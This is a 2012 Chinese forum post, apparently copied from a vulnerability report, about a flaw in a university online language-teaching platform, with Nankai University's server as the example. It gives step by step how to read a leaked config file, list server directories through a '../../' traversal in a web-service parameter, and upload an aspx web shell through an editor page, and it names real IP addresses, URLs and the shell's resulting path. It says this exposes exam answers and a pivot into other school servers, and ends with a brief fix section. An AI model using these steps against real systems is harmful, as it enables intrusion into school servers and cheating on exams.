找回密码
 立即注册
查看: 2670|回复: 0
打印 上一主题 下一主题

新理念外语网络教学平台文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:10:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
5 a1 Q3 l. f" ~2 i/ B! b3 s1 j7 I4 @- y8 q
详细说明:
& v, n6 P. o" t. ^* B' b1 M# |; J/ y
. A2 E. _# B) k" [以南开大学的为例: 7 }/ c; Q6 W7 E- ?+ g7 u
http://222.30.60.3/NPELS
2 W* y7 g' n6 c; s" B& ~7 A7 DNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址3 J8 ^6 U8 T, M( `9 v! `
<setting name="Update_CommonSvr_CommonService" serializeAs="String">' ^  ~4 Y$ Q. c% s7 g
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
' F0 g4 S# O+ e4 ^6 l9 W3 \2 C, i</setting>1 c, f' v& T3 Q8 d7 O* D
及版本号+ C. B  X4 v% P. \6 f  I
<add key="TVersion" value="1, 0, 0, 2187">- Z. }' O3 a+ b$ ]
</add>9 F+ }! s7 A, N! W5 B, L" Z6 f1 \
直接访问
' }- N& x! q1 ~http://222.30.60.3/NPELS/CommonService.asmx
0 G) b5 c6 N) u6 j  o0 _8 \使用GetTestClientFileList操作,直接 HTTP GET 列目录:" ]) ~# ]4 L( c' q- E8 C7 |
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 21878 K7 F- E) R2 H5 c: W4 K: c
进一步列目录(返回的网页很大,可以直接 wget 下来)
# i! C  G9 W+ Q3 h6 Z% Uhttp://222.30.60.3/NPELS/CommonS ... List?version=../../; ~2 y1 t! s+ D6 W! E" K2 d4 W. S
/ Q' i, l  [$ o5 Q5 G( P
发现
, M' ^4 \3 o- s8 X  N. bhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm6 N& `! Z, i! n- ?* l
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
6 ]( N6 v7 v* j- b! Q  b上传后继续列目录找到木马地址直接访问即可
& n3 ^- C& ^/ A0 T) r ) e1 Z( F$ f, ?; v" \
OOXX: |, u) q. W( u6 u9 p) e

3 m! R! ]$ j7 [- Z6 _Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法- M% V3 f% z5 B& Q8 n6 D' Q+ I
漏洞证明:
0 A/ D7 E" J) l/ C1 _# u! F$ V
) P2 |' b6 t: }; B8 d列目录:5 c  u2 q% O0 {9 v5 P+ T# n+ E8 M1 l
http://222.30.60.3/NPELS/CommonS ... List?version=../../7 [. u7 S$ X5 ]
文件上传:, A# H) C8 \% @7 E
http://222.30.60.3/npelsv/editor/editor.htm, M5 M; s" r  B% V  v4 r) G; I

4 x! g! e! b. t+ H# F' m上传木马:
$ i) D* a' c' ^& qhttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx' m8 q1 O; {; E- J% D- c) I! w4 C

  ?* J$ f, @4 p& D# a修复方案:& z% m" w. B7 k. ~
好像考试系统必须使用 CommonService.asmx6 O$ M& b4 A, m6 b$ ~4 G
最好配置文件加密或者用别的方式不让它泄露出来
; L7 F% @- `* S5 |& I, X并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样​& T3 r% D, D& q* M2 C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表